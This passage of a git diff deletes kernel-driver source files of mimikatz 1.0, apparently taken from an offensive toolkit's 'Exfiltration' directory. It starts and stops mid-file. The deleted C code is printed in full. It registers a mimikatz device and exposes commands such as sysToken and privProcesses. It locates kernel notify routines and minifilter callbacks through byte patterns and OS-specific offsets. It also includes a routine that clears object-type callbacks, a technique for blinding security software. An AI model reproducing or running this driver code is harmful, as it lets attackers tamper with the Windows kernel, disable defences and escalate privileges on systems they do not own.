pDeviceObject->Flags |= DO_BUFFERED_IO; - pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING; - - RtlInitUnicodeString(&UStrDosDeviceName, L"\\DosDevices\\mimikatz"); - IoCreateSymbolicLink(&UStrDosDeviceName, &UStrDriverName); - } - - return status; -} - - -ULONG getWindowsIndex() -{ - switch(*NtBuildNumber) - { - case 2600: - return INDEX_XP; - break; - case 3790: - return INDEX_2K3; - break; - case 6000: - case 6001: - return INDEX_VISTA; - case 6002: - return INDEX_2K8; - break; - case 7600: - case 7601: - return INDEX_7; - break; - case 8102: - case 8250: - case 9200: - return INDEX_8; - break; - default: - return 0; - } -} - -NTSTATUS getLocalFuncFromName(PWSTR buffer, size_t taille, PWSTR *params, size_t * tailleParams, ptrLocalFunction * destFunc) -{ - NTSTATUS status; - size_t tailleChaine; - ULONG i; - ULONG taillFunc; - - status = RtlStringCbLengthW(buffer, taille, &tailleChaine); - if(NT_SUCCESS(status)) - { - for(i = 0; (i < tailleChaine / sizeof(WCHAR)) && (buffer[i] != L' '); i++); - - if( (i+1) < (tailleChaine / sizeof(WCHAR))) - { - *params = buffer + (i+1); - *tailleParams = (tailleChaine / sizeof(WCHAR)) - (i+1); // avoir !!! - DbgPrint("%u", *tailleParams); - } - else - { - *params = NULL; - *tailleParams = 0; - } - - *destFunc = NULL; - taillFunc = i*sizeof(WCHAR); - - - KIWI_NameToFunc(L"ping", kPing); - - if(INDEX_OS) - { - KIWI_NameToFunc(L"ssdt", kSSDT); - - KIWI_NameToFunc(L"listModules", kModulesList); - KIWI_NameToFunc(L"listFilters", kFiltersList); - KIWI_NameToFunc(L"listMinifilters", kMiniFiltersList); - - KIWI_NameToFunc(L"listNotifProcesses", kListNotifyProcesses); - KIWI_NameToFunc(L"listNotifThreads", kListNotifyThreads); - KIWI_NameToFunc(L"listNotifImages", kListNotifyImages); - KIWI_NameToFunc(L"listNotifRegistry", kListNotifyRegistry); - KIWI_NameToFunc(L"listNotifObjects", kListNotifyObjects); - KIWI_NameToFunc(L"clearNotifObjects", kClearNotifyObjects); - - KIWI_NameToFunc(L"listProcesses", listProcesses); - KIWI_NameToFunc(L"sysToken", sysToken); - KIWI_NameToFunc(L"privProcesses", privProcesses); - } - } - return status; -} - - -NTSTATUS kPing(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - return RtlStringCbPrintfExW(pszDest, cbDest, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"Pong (from ring 0 :)\n"); -} diff --git a/Exfiltration/mimikatz-1.0/driver/mimikatz.h b/Exfiltration/mimikatz-1.0/driver/mimikatz.h deleted file mode 100644 index 3ece6e2..0000000 --- a/Exfiltration/mimikatz-1.0/driver/mimikatz.h +++ /dev/null @@ -1,26 +0,0 @@ -#pragma once - -#include "minifilters.h" -#include "fsfilters.h" -#include "modules.h" -#include "processes.h" -#include "ssdt.h" - -#include "notify.h" - -#include "k_types.h" - -#include <ntddk.h> - -extern PSHORT NtBuildNumber; -ULONG getWindowsIndex(); - -DRIVER_INITIALIZE DriverEntry; -DRIVER_UNLOAD DriverUnload; - -DRIVER_DISPATCH UnSupported; -__drv_dispatchType(IRP_MJ_READ) DRIVER_DISPATCH Read; -__drv_dispatchType(IRP_MJ_WRITE) DRIVER_DISPATCH Write; - -NTSTATUS getLocalFuncFromName(PWSTR buffer, size_t taille, PWSTR *params, size_t * tailleParams, ptrLocalFunction * destFunc); -NTSTATUS kPing(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); diff --git a/Exfiltration/mimikatz-1.0/driver/minifilters.c b/Exfiltration/mimikatz-1.0/driver/minifilters.c deleted file mode 100644 index 90ba7ef..0000000 --- a/Exfiltration/mimikatz-1.0/driver/minifilters.c +++ /dev/null @@ -1,193 +0,0 @@ -#include "minifilters.h" - -const ULONG MF_OffSetTable[MAX_OS_LEN][MAX_MF_LEN] = -{ - /* INDEX_MF_CALLBACK_OFF, INDEX_MF_CALLBACK_PRE_OFF, INDEX_MF_CALLBACK_POST_OFF, INDEX_MF_VOLUME_NAME_OFF */ -#ifdef _M_IX86 -/* INDEX_UNK */ {0x0000, 0x0000, 0x0000, 0x0000}, -/* INDEX_XP */ {0x007c, 0x000c, 0x0010, 0x002c}, -/* INDEX_2K3 */ {0x007c, 0x000c, 0x0010, 0x002c}, -/* INDEX_VISTA */ {0x004c, 0x000c, 0x0010, 0x0030}, -/* INDEX_2K8 */ {0x004c, 0x000c, 0x0010, 0x0030}, -/* INDEX_7 */ {0x004c, 0x000c, 0x0010, 0x0030}, -/* INDEX_2K8R2 */ {0x0000, 0x0000, 0x0000, 0x0000},/* n'existe pas !*/ -/* INDEX_8 */ {0x004c, 0x000c, 0x0010, 0x0030} -#else -/* INDEX_UNK */ {0x0000, 0x0000, 0x0000, 0x0000}, -/* INDEX_XP */ {0x0000, 0x0000, 0x0000, 0x0000},/* n'existe pas, XP x64 est 2003 x64 */ -/* INDEX_2K3 */ {0x00e8, 0x0018, 0x0020, 0x0048}, -/* INDEX_VISTA */ {0x0090, 0x0018, 0x0020, 0x0050}, -/* INDEX_2K8 */ {0x0090, 0x0018, 0x0020, 0x0050}, -/* INDEX_7 */ {0x0090, 0x0018, 0x0020, 0x0050}, -/* INDEX_2K8R2 */ {0x0090, 0x0018, 0x0020, 0x0050}, -/* INDEX_8 */ {0x0090, 0x0018, 0x0020, 0x0050} -#endif -}; - -const WCHAR *irpToName[] = { - L"CREATE", - L"CREATE_NAMED_PIPE", - L"CLOSE", - L"READ", - L"WRITE", - L"QUERY_INFORMATION", - L"SET_INFORMATION", - L"QUERY_EA", - L"SET_EA", - L"FLUSH_BUFFERS", - L"QUERY_VOLUME_INFORMATION", - L"SET_VOLUME_INFORMATION", - L"DIRECTORY_CONTROL", - L"FILE_SYSTEM_CONTROL", - L"DEVICE_CONTROL", - L"INTERNAL_DEVICE_CONTROL", - L"SHUTDOWN", - L"LOCK_CONTROL", - L"CLEANUP", - L"CREATE_MAILSLOT", - L"QUERY_SECURITY", - L"SET_SECURITY", - L"POWER", - L"SYSTEM_CONTROL", - L"DEVICE_CHANGE", - L"QUERY_QUOTA", - L"SET_QUOTA", - L"PNP", -}; - -NTSTATUS kMiniFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - - ULONG i, j, k; - - ULONG NumberFiltersReturned = 0; - PFLT_FILTER *FilterList = NULL; - - ULONG BytesReturned = 0; - PFILTER_FULL_INFORMATION myFilterFullInformation = NULL; - - PFLT_INSTANCE *InstanceList = NULL; - ULONG NumberInstancesReturned = 0; - - PFLT_VOLUME RetVolume = NULL; - - PVOID monCallBack, preCallBack, postCallBack; - - *ppszDestEnd = pszDest; - *pcbRemaining= cbDest; - - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kMiniFiltersList\n\n"); - if(NT_SUCCESS(status)) - { - status = FltEnumerateFilters(NULL, 0, &NumberFiltersReturned); - if((status == STATUS_BUFFER_TOO_SMALL) && (NumberFiltersReturned > 0)) - { - FilterList = ExAllocatePoolWithTag(NonPagedPool, sizeof(PFLT_FILTER) * NumberFiltersReturned, POOL_TAG); - if(FilterList != NULL) - { - status = FltEnumerateFilters(FilterList, sizeof(PFLT_FILTER) * NumberFiltersReturned, &NumberFiltersReturned); - for(i = 0; (i < NumberFiltersReturned) && NT_SUCCESS(status); i++) - { - status = FltGetFilterInformation(FilterList[i], FilterFullInformation, NULL, 0, &BytesReturned); - if((status == STATUS_BUFFER_TOO_SMALL) && (BytesReturned > 0)) - { - myFilterFullInformation = ExAllocatePoolWithTag(NonPagedPool, BytesReturned, POOL_TAG); - if(myFilterFullInformation != NULL) - { - status = FltGetFilterInformation(FilterList[i], FilterFullInformation, myFilterFullInformation, BytesReturned, &BytesReturned); - if(NT_SUCCESS(status)) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L"%*.*ws\n", - myFilterFullInformation->FilterNameLength/sizeof(WCHAR), myFilterFullInformation->FilterNameLength/sizeof(WCHAR), - myFilterFullInformation->FilterNameBuffer - ); - - if(NT_SUCCESS(status)) - { - status = FltEnumerateInstances(NULL, FilterList[i], NULL, 0, &NumberInstancesReturned); - if((status == STATUS_BUFFER_TOO_SMALL) && (NumberInstancesReturned > 0)) - { - InstanceList = ExAllocatePoolWithTag(NonPagedPool, sizeof(PFLT_INSTANCE) * NumberInstancesReturned, POOL_TAG); - if(InstanceList != NULL) - { - status = FltEnumerateInstances(NULL, FilterList[i], InstanceList, NumberInstancesReturned, &NumberInstancesReturned); - for(j = 0; (j < NumberInstancesReturned) && NT_SUCCESS(status); j++) - { - /* - http://msdn.microsoft.com/en-us/library/windows/hardware/ff541499%28v=VS.85%29.aspx - * InstanceName - * Altitude - * VolumeName - - FilterName - */ - - if(NT_SUCCESS(FltGetVolumeFromInstance(InstanceList[j], &RetVolume))) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L" Instance %u @ %wZ\n", - j, - (PUNICODE_STRING) (((ULONG_PTR) RetVolume) + MF_OffSetTable[INDEX_OS][INDEX_MF_VOLUME_NAME_OFF]) - ); - FltObjectDereference (RetVolume); - } - else - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L" Instance %u\n", - j - ); - } - - for(k = 0x16; (k < 0x32) && NT_SUCCESS(status); k++) - { - monCallBack = (PVOID) *(PULONG_PTR) (( ((ULONG_PTR) InstanceList[j] )+ MF_OffSetTable[INDEX_OS][INDEX_MF_CALLBACK_OFF]) + sizeof(PVOID)*k); - if(monCallBack != NULL) - { - preCallBack = (PVOID) *(PULONG_PTR) (((ULONG_PTR) monCallBack) + MF_OffSetTable[INDEX_OS][INDEX_MF_CALLBACK_PRE_OFF]); - postCallBack = (PVOID) *(PULONG_PTR) (((ULONG_PTR) monCallBack) + MF_OffSetTable[INDEX_OS][INDEX_MF_CALLBACK_POST_OFF]); - - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L" [0x%2x %-24ws] ", - k, - irpToName[k - 0x16] - ); - - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) preCallBack, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" / "); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) postCallBack, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - - } - } - } - FltObjectDereference (InstanceList[j]); - } - ExFreePoolWithTag(InstanceList, POOL_TAG); - } - } - } - } - ExFreePoolWithTag(myFilterFullInformation, POOL_TAG); - } - } - FltObjectDereference (FilterList[i]); - } - ExFreePoolWithTag(FilterList, POOL_TAG); - } - } - } - return status; -} diff --git a/Exfiltration/mimikatz-1.0/driver/minifilters.h b/Exfiltration/mimikatz-1.0/driver/minifilters.h deleted file mode 100644 index 647031a..0000000 --- a/Exfiltration/mimikatz-1.0/driver/minifilters.h +++ /dev/null @@ -1,12 +0,0 @@ -#pragma once -#include <fltkernel.h> -#include "k_types.h" -#include "modules.h" - -#define INDEX_MF_CALLBACK_OFF 0 -#define INDEX_MF_CALLBACK_PRE_OFF 1 -#define INDEX_MF_CALLBACK_POST_OFF 2 -#define INDEX_MF_VOLUME_NAME_OFF 3 -#define MAX_MF_LEN 4 - -NTSTATUS kMiniFiltersList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/mod_memory.c b/Exfiltration/mimikatz-1.0/driver/mod_memory.c deleted file mode 100644 index d5a05b3..0000000 --- a/Exfiltration/mimikatz-1.0/driver/mod_memory.c +++ /dev/null @@ -1,32 +0,0 @@ -#include "mod_memory.h" - -NTSTATUS searchMemory(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur) -{ - for(*addressePattern = adresseBase; (adresseMaxMin > adresseBase) ? (*addressePattern <= adresseMaxMin) : (*addressePattern >= adresseMaxMin); *addressePattern += (adresseMaxMin > adresseBase) ? 1 : -1) - { - if(RtlCompareMemory(pattern, *addressePattern, longueur) == longueur) - { - return STATUS_SUCCESS; - } - } - *addressePattern = NULL; - return STATUS_NOT_FOUND; -} - -NTSTATUS genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo) -{ - NTSTATUS status = searchMemory(adresseBase, adresseMaxMin, pattern, addressePointeur, longueur); - if(NT_SUCCESS(status)) - { - *addressePointeur += offsetTo; - #ifdef _M_X64 - *addressePointeur += sizeof(LONG) + *(PLONG)(*addressePointeur); - #elif defined _M_IX86 - *addressePointeur = *(PUCHAR *)(*addressePointeur); - #endif - - if(!*addressePointeur) - status = STATUS_INVALID_HANDLE; - } - return status; -} diff --git a/Exfiltration/mimikatz-1.0/driver/mod_memory.h b/Exfiltration/mimikatz-1.0/driver/mod_memory.h deleted file mode 100644 index 0c10fb9..0000000 --- a/Exfiltration/mimikatz-1.0/driver/mod_memory.h +++ /dev/null @@ -1,5 +0,0 @@ -#pragma once -#include "k_types.h" - -NTSTATUS searchMemory(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, PUCHAR *addressePattern, SIZE_T longueur); -NTSTATUS genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const PUCHAR pattern, SIZE_T longueur, LONG offsetTo); diff --git a/Exfiltration/mimikatz-1.0/driver/modules.c b/Exfiltration/mimikatz-1.0/driver/modules.c deleted file mode 100644 index 7ca3551..0000000 --- a/Exfiltration/mimikatz-1.0/driver/modules.c +++ /dev/null @@ -1,110 +0,0 @@ -#include "modules.h" - -NTSTATUS kModulesList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status = STATUS_SUCCESS; - ULONG i; - ULONG modulesSize; - AUX_MODULE_EXTENDED_INFO* modules; - ULONG numberOfModules; - - *ppszDestEnd = pszDest; - *pcbRemaining= cbDest; - - status = AuxKlibInitialize(); - if(NT_SUCCESS(status)) - { - status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL); - if (NT_SUCCESS(status)) - { - if(modulesSize > 0) - { - numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO); - modules = (AUX_MODULE_EXTENDED_INFO*) ExAllocatePoolWithTag(PagedPool, modulesSize, POOL_TAG); - - if(modules != NULL) - { - status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules); - if (NT_SUCCESS(status)) - { - for(i = 0; i < numberOfModules; i++) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L"%p - %.8u [%S] %S\n", - modules[i].BasicInfo.ImageBase, - modules[i].ImageSize, - modules[i].FullPathName + modules[i].FileNameOffset, - modules[i].FullPathName - ); - } - } - ExFreePoolWithTag(modules, POOL_TAG); - } - } - } - } - - return status; -} - -NTSTATUS getModuleFromAddr(ULONG_PTR theAddr, LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status = STATUS_SUCCESS; - ULONG i; - ULONG modulesSize; - AUX_MODULE_EXTENDED_INFO* modules; - ULONG numberOfModules; - - *ppszDestEnd = pszDest; - *pcbRemaining= cbDest; - - status = AuxKlibInitialize(); - if(NT_SUCCESS(status)) - { - status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL); - if (NT_SUCCESS(status)) - { - if(modulesSize > 0) - { - numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO); - modules = (AUX_MODULE_EXTENDED_INFO*) ExAllocatePoolWithTag(PagedPool, modulesSize, POOL_TAG); - - if(modules != NULL) - { - status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules); - if (NT_SUCCESS(status)) - { - for(i = 0; i < numberOfModules; i++) - { - status = STATUS_NOT_FOUND; - if(theAddr >= (ULONG_PTR) modules[i].BasicInfo.ImageBase && theAddr < ((ULONG_PTR) modules[i].BasicInfo.ImageBase + modules[i].ImageSize)) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, - L"%p [%S+%u]", - theAddr, - modules[i].FullPathName + modules[i].FileNameOffset, - theAddr - (ULONG_PTR) modules[i].BasicInfo.ImageBase - ); - break; - } - - - } - - if(status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"%p [?]", theAddr); - if (NT_SUCCESS(status)) status = STATUS_NOT_FOUND; - } - } - ExFreePoolWithTag(modules, POOL_TAG); - } - } - } - } - - return status; -} - - - diff --git a/Exfiltration/mimikatz-1.0/driver/modules.h b/Exfiltration/mimikatz-1.0/driver/modules.h deleted file mode 100644 index 86fe625..0000000 --- a/Exfiltration/mimikatz-1.0/driver/modules.h +++ /dev/null @@ -1,7 +0,0 @@ -#pragma once -#include <ntddk.h> -#include <aux_klib.h> -#include "k_types.h" - -NTSTATUS kModulesList(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); -NTSTATUS getModuleFromAddr(ULONG_PTR theAddr, LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/notify.h b/Exfiltration/mimikatz-1.0/driver/notify.h deleted file mode 100644 index 8ee225a..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify.h +++ /dev/null @@ -1,19 +0,0 @@ -#pragma once -#include <ntifs.h> -#include "k_types.h" -#include "modules.h" -#include "mod_memory.h" -#include "notify_process.h" -#include "notify_thread.h" -#include "notify_image.h" -#include "notify_reg.h" -#include "notify_object.h" - -typedef struct _KIWI_CALLBACK -{ - #ifdef _M_IX86 - PVOID unk0; - #endif - PVOID * callback; - LARGE_INTEGER * opt_cookie; // structure de feignant pour les process;threads;images aussi -} KIWI_CALLBACK, *PKIWI_CALLBACK; diff --git a/Exfiltration/mimikatz-1.0/driver/notify_image.c b/Exfiltration/mimikatz-1.0/driver/notify_image.c deleted file mode 100644 index 6f03fd4..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_image.c +++ /dev/null @@ -1,117 +0,0 @@ -#include "notify_image.h" - -ULONG * PspLoadImageNotifyRoutineCount = NULL; -PVOID * PspLoadImageNotifyRoutine = NULL; - -NTSTATUS kListNotifyImages(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - ULONG i; - PKIWI_CALLBACK monCallBack; - - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyImages\n\n"); - if(NT_SUCCESS(status)) - { - status = getPspLoadImageNotifyRoutine(); - if(NT_SUCCESS(status)) - { - for(i = 0; (i < *PspLoadImageNotifyRoutineCount) && NT_SUCCESS(status); i++) - { - monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspLoadImageNotifyRoutine[i]); - if(monCallBack != NULL) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - } - } - } - return status; -} - -NTSTATUS getPspLoadImageNotifyRoutine() -{ - NTSTATUS retour = STATUS_NOT_FOUND; - #ifdef _M_X64 - UCHAR PTRN_WNT5_Image[] = {0x48, 0x8d, 0x35}; - LONG OFFS_WNT5_Image = sizeof(PTRN_WNT5_Image); - UCHAR PTRN_WNT6_Image[] = {0x48, 0x8d, 0x0d}; - LONG OFFS_WNT6_Image = sizeof(PTRN_WNT6_Image); - - LONG OFFS_WNT5_Count = - 0x0c; - LONG OFFS_WNT6_Count = sizeof(PVOID) * MAX_NT_PspLoadImageNotifyRoutine; - #elif defined _M_IX86 - UCHAR PTRN_WNT5_Image[] = {0x6a, 0x00, 0x53, 0x56}; - UCHAR PTRN_WNO8_Image[] = {0x6a, 0x00, 0x8b, 0xcb, 0x8b, 0xc6}; - UCHAR PTRN_WIN8_Image[] = {0x33, 0xff, 0x6a, 0x00, 0x53, 0x8b, 0xc6}; - LONG OFFS_WALL_Image = -(LONG) sizeof(PVOID); - - LONG OFFS_WNT5_Count = - 0x18; - LONG OFFS_WNO8_Count = sizeof(PVOID) * MAX_NT_PspLoadImageNotifyRoutine; - LONG OFFS_WIN8_Count = - 0x20; - #endif - - PUCHAR pointeur = NULL, pattern = NULL, refDebut = (PUCHAR) PsSetLoadImageNotifyRoutine, refFin = refDebut + PAGE_SIZE; SIZE_T taille = 0; LONG offsetTo = 0; - LONG offsetToCountEx = 0, offsetToCount = 0; - - if(PspLoadImageNotifyRoutine && PspLoadImageNotifyRoutineCount) - { - retour = STATUS_SUCCESS; - } - else - { - if(INDEX_OS < INDEX_VISTA) - { - pattern = PTRN_WNT5_Image; - taille = sizeof(PTRN_WNT5_Image); - #ifdef _M_X64 - offsetTo = OFFS_WNT5_Image; - #endif - offsetToCount = OFFS_WNT5_Count; - } - else - { - #ifdef _M_X64 - pattern = PTRN_WNT6_Image; - taille = sizeof(PTRN_WNT6_Image); - offsetTo = OFFS_WNT6_Image; - offsetToCount = OFFS_WNT6_Count; - #elif defined _M_IX86 - if(INDEX_OS < INDEX_8) - { - pattern = PTRN_WNO8_Image; - taille = sizeof(PTRN_WNO8_Image); - offsetToCount = OFFS_WNO8_Count; - } - else - { - pattern = PTRN_WIN8_Image; - taille = sizeof(PTRN_WIN8_Image); - offsetToCount = OFFS_WIN8_Count; - } - #endif - } - #ifdef _M_IX86 - offsetTo = OFFS_WALL_Image; - #endif - - retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo); - if(NT_SUCCESS(retour)) - { - PspLoadImageNotifyRoutine = (PVOID) (pointeur); - PspLoadImageNotifyRoutineCount = (PULONG) (pointeur + offsetToCount); - - if(PspLoadImageNotifyRoutine && PspLoadImageNotifyRoutineCount) - retour = STATUS_SUCCESS; - } - } - return retour; -} diff --git a/Exfiltration/mimikatz-1.0/driver/notify_image.h b/Exfiltration/mimikatz-1.0/driver/notify_image.h deleted file mode 100644 index f6e0711..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_image.h +++ /dev/null @@ -1,10 +0,0 @@ -#pragma once -#include "notify.h" - -#define MAX_NT_PspLoadImageNotifyRoutine 8 - -ULONG * PspLoadImageNotifyRoutineCount; -PVOID * PspLoadImageNotifyRoutine; - -NTSTATUS getPspLoadImageNotifyRoutine(); -NTSTATUS kListNotifyImages(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); diff --git a/Exfiltration/mimikatz-1.0/driver/notify_object.c b/Exfiltration/mimikatz-1.0/driver/notify_object.c deleted file mode 100644 index 9eac3bb..0000000 --- a/Exfiltration/mimikatz-1.0/driver/notify_object.c +++ /dev/null @@ -1,173 +0,0 @@ -#include "notify_object.h" - -POBJECT_DIRECTORY * ObpTypeDirectoryObject = NULL; - -const WCHAR *procCallToName[] = { - L"Dump ", - L"Open ", - L"Close ", - L"Delete ", - L"Parse ", - L"Security ", - L"QueryName ", - L"OkayToClose", -}; - -NTSTATUS kListNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - return listNotifyOrClearObjects(pszDest, cbDest, ppszDestEnd, pcbRemaining, ListNotif); -} - -NTSTATUS kClearNotifyObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - return listNotifyOrClearObjects(pszDest, cbDest, ppszDestEnd, pcbRemaining, ClearNotif); -} - -NTSTATUS listNotifyOrClearObjects(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_NOTIF_OBJECT_ACTION action) -{ - NTSTATUS status; - ULONG i, j; - POBJECT_DIRECTORY_ENTRY monEntree; - POBJECT_TYPE monType, monTypeDecal; - PVOID * miniProc; - POBJECT_CALLBACK_ENTRY pStruct; - - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyObjects\n\n"); - - if(NT_SUCCESS(status)) - { - status = getObpTypeDirectoryObject(); - if(NT_SUCCESS(status)) - { - for(i = 0; (i < OBJECT_HASH_TABLE_SIZE) && NT_SUCCESS(status); i++) - { - if((*ObpTypeDirectoryObject)->HashBuckets[i]) - { - for(monEntree = (*ObpTypeDirectoryObject)->HashBuckets[i]; monEntree && NT_SUCCESS(status); monEntree = monEntree->NextEntry) - { - if(monType = monEntree->Object) - { - if(INDEX_OS < INDEX_VISTA) - monType = (POBJECT_TYPE) ((ULONG_PTR) (monType) + sizeof(ERESOURCE)); - - if(action == ListNotif) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n%wZ\n", &(monType->Name)); - for(j = 0; (j < 8) && NT_SUCCESS(status); j++) - { - miniProc = (PVOID *) (((ULONG_PTR) &(monType->TypeInfo)) + FIELD_OFFSET(OBJECT_TYPE_INITIALIZER, DumpProcedure) + sizeof(PVOID)*j - #ifdef _M_IX86 - - ((INDEX_OS < INDEX_VISTA) ? sizeof(ULONG) : 0) - #endif - ); - if(*miniProc) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" - %ws : ", procCallToName[j]); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) *miniProc, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - } - } - if(INDEX_OS >= INDEX_VISTA) - { - if(INDEX_OS < INDEX_7) - monType = (POBJECT_TYPE) ((ULONG_PTR) (monType) + sizeof(ERESOURCE) + 32*sizeof(EX_PUSH_LOCK)); - else if (INDEX_OS > INDEX_7) - monType = (POBJECT_TYPE) ((ULONG_PTR) (monType) + sizeof(ULONG) + 2*sizeof(USHORT)); // W8 : nouveaux champs avant les callbacks - - for(pStruct = (POBJECT_CALLBACK_ENTRY) (monType->CallbackList.Flink) ; (pStruct != (POBJECT_CALLBACK_ENTRY) &(monType->CallbackList)) && NT_SUCCESS(status) ; pStruct = (POBJECT_CALLBACK_ENTRY) pStruct->CallbackList.Flink) - { - if(pStruct->PreOperation || pStruct->PostOperation) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" * Callback %u : ", pStruct->Operations, pStruct->PreOperation);; - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) pStruct->PreOperation, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L" / "); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr((ULONG_PTR) pStruct->PostOperation, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - } - - if(action == ClearNotif) - { - pStruct->PreOperation = NULL; - pStruct->PostOperation = 